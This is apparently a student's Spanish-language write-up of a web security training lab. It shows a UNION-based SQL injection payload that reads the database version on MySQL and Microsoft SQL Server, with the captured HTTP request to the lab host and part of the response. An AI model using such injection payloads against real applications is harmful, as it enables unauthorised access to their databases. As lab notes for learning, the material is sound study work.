

2 Lab SQL injection attack, querying the database type and version on MySQL and Microsoft

En este caso debemos encontrar la versión de MySQL y Microsoft (se usa el mismo ataque en ambos casos)

Para ello utilizaremos la siguiente sentencia:

```
``UNION+SELECT+@@version,+NULL#
```

Request

```
Pretty Raw Hex
1 GET /filter?category=Gifts'+UNION+SELECT+@@version,+NULL#
  HTTP/2
2 Host: 0aa400a004784bac80bc21e20001001c.web-security-academy.net
3 Cookie: session=M5mQumtYyhdCu0xraY4PKryQiSzL8gPS
4 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0)
  Gecko/20100101 Firefox/128.0
5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
6 Accept-Language: en-US,en;q=0.5
7 Accept-Encoding: gzip, deflate, br
8 Referer:
```

Response

```
Pretty Raw Hex Render
22 Back&nbsp;to&nbsp;lab&nbsp;
   ;description&nbsp;
23 <svg version=1.1 id=
   Layer_1 xmlns='
   http://www.w3.org/2000/svg
   ' xmlns:xlink='
   http://www.w3.org/1999/xli
   nk' x=0px y=0px viewBox='0
   0 28 30'
   enable-background='new 0 0
   28 30' xml:space=preserve
   title=back-arrow>
24 <g>
```